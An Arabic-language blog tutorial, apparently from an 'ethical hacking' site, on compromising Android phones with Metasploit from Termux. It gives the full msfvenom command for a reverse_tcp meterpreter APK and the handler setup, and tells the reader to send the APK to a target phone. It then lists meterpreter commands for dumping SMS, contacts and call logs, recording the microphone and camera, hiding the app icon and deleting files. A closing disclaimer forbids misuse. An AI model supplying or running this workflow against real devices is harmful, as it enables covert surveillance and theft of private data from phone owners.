صنع صفحة مزورة احترافية بدون لغات برمجة وبدون مواقع 2021

 

كيفية اختبار اختراق الاندرويد بالميتاسبلويت من ترمكس داخلياً

اختراق الاندرويد بالميتاسبلويت

اوامر الاختراق ميتاسبلويت

انشاء بايلود termux

 

- مرحباً بكم مجدداً متابعينا الأعزاء و زورانا الكرماء بعد فترة من الغياب على قناة و موقع القرصان الإلكتروني للتعليم ، شرحُنا اليوم هو عن كيف يتم اختراق الاندرويد داخلياً بواسطة البايلود في الميتاسبلويت من خلال تطبيق ترمكس ، و سوف نقوم بـ انشاء بايلود termux و نتعرف سوياً على اوامر الاختراق ميتاسبلويت ، وسوف يكون هذا الشرح تكملة لسلسة تعلم اختبار الاختراق الأخلاقي مع تطبيق تيرمكس ، و لقد كنا قد شرحنا لكم في درسٍ سابق عن كيفية تثبيت أداة ميتاسبلويت الخاصة بعمل اختبار اختراق للتطبيقات و الأنظمة ، أما اليوم ف سنريكم كيفية عمل اختبار اختراق للهواتف التي تعمل بأنظمة أندرويد و كيف يتم ذلك وبالبطبع من خلال أداة ميتاسبلويت المشهورة .

 

- يعتبر تطبيق ترمكس واحداً من أقوى التطبيقات و أكثرها شهرة بين الناس ، و لا سيما بعد أن تطورت التقنيات و البرمجيات و أصبح اختبار الاختراق شيء مهم لفحص الثغرات و إبقاء البرامج و البيانات في أمان دائم ، و أصبح تطبيق تيرمكس تطبيقاً لا بد من توفره على هاتف أي مبتدأ في عالم اختبار الاختراق و الهكر الأخلاقي ، و من هنا بدأت الحكاية فظهر تطبيق ترمكس و ظهرت معه الأدوات الرائعة للهواتف ، و من بين أفضل هذه الأدوات كانت هي أداة الميتاسبلويت فريم وورك (metasploit framework) ، وهي أداة ضخمة تحتوي على العديد من الأدوات و السكربتات المطورة و المبرمجة من على أيدي محترفين ، و تساعدك أداة ميتاسبلويت على عمل اختبار اختراق لأغلب الأنظمة لفحصها تدقيقاً عن أي خللٍ أو خطأ برمجي أو ثغرة قد تؤدي الى نتائج سلبية ، ولا يقتصر عمل الميتاسبلويت على اختبار اختراق الأنظمة ، بل و إنما تساعدك أيضاً على فحص الثغرات في الشبكات و تطبيقات الويب و الأجهزة الأخرى .

انشاء بايلود termux

- لعمل اختبار اختراق يتوجب علينا أولاً إنشاء برمجية بايلود ، و لكي نقوم بإنشاء هذه البرمجية سوف نقوم بالدخول الى تطبيق ترمكس ، و نقوم بعدها بتشغيل أداة الميتاسبلويت بالأمر msfconsole وننتظر الى حين بدأ تشغيل الأداة ، و بعد تشغيل الأداة سوف نقوم بفتح صفحة جديد في داخل الترمكس ، و نقوم بكتابة الأمر التالي لتكوين البايلود :

msfvenom -p android/meterpreter/reverse_tcp LHOST=YOURIP LPORT=4444 R > /sdcard/payload.apk

و شرح الأمر السابق ببساطة هو كالتالي :

• msfvenom هو الأمر الذي يسمح لنا بإنشاء برمجية بايلود بشكل عام .
• -p  هو اختصاراً لكلمة بلات فورم (platform) و التي تعني نظام التشغيل او منصة التشغيل .
• android  هو نظام التشغيل .
• meterpreter هي برمجية تمكننا من التحكم في نقل الملفات و تمرير البيانات و الأوامر .
•  reverse_tcp هو نوع من أنواع البايلود لأنظمة أندرويد يسمح لنا بعمل الاتصال عن طريق بروتوكول TCP .
• LHOST= هنا نقوم بوضع عنوان الآي بي الداخلي الخاص بنا أي العنوان الذي نحصل عليه من الراوتر أو الشبكة الداخلية  . ملاحظة : يمكنك استخدام الأمر ( ifconfig ) لعرض بيانات الشبكة و الـ IP الخاص بك .
• LPORT= هنا نقوم بتحديد نوع المنفذ أو البورت كما يعرف وهوه منفذ خاص بجدارن الحماية يسمح لنا بالاتصال بشكل مباشر ، و قمنا بتحديدها على الرقم 4444 وهو منفذ معترف عليه ، ويمكنك وضع أي منفذ تريده .
• R >  هو إشارة الى نوع و مسار حفظ الملف و لاحقته .
• sdcard هي ذاكرة التخزين التي سيحفظ عليها الملف .
• payload.apk هو برمجية البايلود  التي سيتم إنشائها و هو على صيغة apk  أي كشكل تطبيق ويمكن تغير اسمه على حسب ما تريد .

اوامر الاختراق ميتاسبلويت

- بعد إتمام إنشاء البايلود (payload  ) نقوم الآن بالرجوع الى الصفحة الأولى التي قمنا بفتحها أولاً وهي أداة ميتاسبلويت و نقوم بكتابة الأوامر التالية لبدأ تشغيل جلسة التنصت وهي كالآتي :

use exploit/multi/handler

و نضغط على انتر ، حيث يعبر هذا الأمر عن تشغيل بيئة خاصة بقراءة و التعرف على أنوع البايلود و التعامل معها ، من ثم نقوم بكتابة

set payload android/meterpreter/reverse_tcp

و ايضاً انتر ، و هنا في هذا الأمر قمنا بتحديد نوع البايلود وهو نفسه الذي تم تحديده في التطبيق عند انشاء بايلود ، وبعدها نقوم بتحديد عنوان الآيبي الخاص بنا و الذي تم وضعها ضمن تطبيق بايلود و ذلك من خلال الأمر 

set LHOST و نكتب الـآي بي

من ثم نقوم بتحديد المنفذ الذي تم وضعه أيضاً ضمن البرمجية من خلال الأمر 

set LPORT= 4444

و أخيراً نقوم الآن بكتابة الأمر 

exploit

لبدأ التنصت و بدأ اختبار الاختراق على الجهاز الآخر و مراقبة ما يحدث بالتفصيل .

اوامر التحكم بجهاز الضحية metasploit

- الآن و بعد إتمام إنشاء البايلود من خلال ترمكس سوف نقوم ببدأ اختبار الاختراق على جهازٍ آخر ، و لكي نقوم بهذا الأمر سوف نقوم بإرسال التطبيق الى الجهاز المراد عمل اختبار الاختراق عليه و القيام بتثبيته  ، وبعد ذلك سوف نعود الى جلسة التنصت لنلاحظ أنه بالفعل قد نجح اختبار الاختراق و بدأت الجلسة بالتنصت و يمكننا التحكم بالهاتف بالكامل من خلال الأوامر التالية :

bglist يساعدك على عرض قائمة بالسكربتات التي تعمل في الخلفية

help لعرض قائمة المساعدة

cat لقراءة ملف نصي و رأيت ما بداخله

cd للتنقل بين المسارات و المجلدات

pwd لعرض المسار الحالي الذي تتواجد بداخله

cp لنسخ ملف  

del لحذف ملف معين

download لتنزيل ملف معين

uploadلرفع ملف معين  

rm * لحذف كافة الملفات و عمل التئهية   

rmdir لحذف مجلد معين

mkdir لإنشاء مجلد

sysinfo لعرض معلومات حول النظام

screenshare لمشاهدة سطح المكتب بالوقت الفعلي

screenshot لأخذ لقطة شاشة من الجهاز

record_mic للبدأ بتسجيل مقطع صوتي

webcam_stream للبدأ بتسجيل مقطع فيديو

webcam_snap لأخذ صورة من الكاميرا

check_root لفحص الجهاز إذا كان يحتوي على روت أو لا

dump_calllog للحصول على المكالمات الصوتية

dump_contacts للحصول على بيانات جهات الاتصال

dump_sms للحصول على رسائل الإس أم إس

send_sms لإرسال رسالة إس إم إس

hide_app_icon لإخفاء أيقونة التطبيق من على الجهاز

app_install لتثبيت تطبيق ما

app_list لعرض كافة التطبيقات المثبتة

app_run لتشغيل تطبيق مثبت

app_uninstall لإلغاء تثبيت تطبيق ما

- للحصول على مزيد من الأوامر يمكنك فقط كتاب إشارة الاستفهام ضمن الـ Meterpreter .

إذا واجهتك صعوبة في فهم ما تحدثنا عنه يمكنك مشاهدة هذا الفيديو للتعرف على الموضوع أكثر

 ملاحظة هامة جداً : إن كل ما نشرحه حول القرصنة الأخلاقية هو بهدف التوعية الأمنية الإلكتروني  وللتعرف طرق القرصنة و حماية أنفسكم منها ، ولا نسمح قطعاً و أبداً باستخدام هذا الشروحات لإلحاق الضرر بالآخرين مهما كان الدافع ، ولسنا مسؤولين عن أي شيء غير قانوني تقوم باستخدامه .

- كان هذا الشرح هو عن كيفية اختبار اختراق الاندرويد عبر ميتاسبلويت داخلياً ، و في الدرس القادم سنحاول أن نشرح لكم طريق اختبار الاختراق بشكل خارجي أي ليس ضمن الشبكة و في مكان بعيد عنك ، فنتمنى منك حقاً مشارك هذا الشرح مع أصدقائك ليستفيدوا منه و يحمون أنفسهم من هذه التطبيقات ، ونراك في درس جديد . 

>>>  رابط تحميل اوامر الاختراق ميتاسبلويت <<< 

باسوورد فك الضغط : thedigitalagee.blogspot.com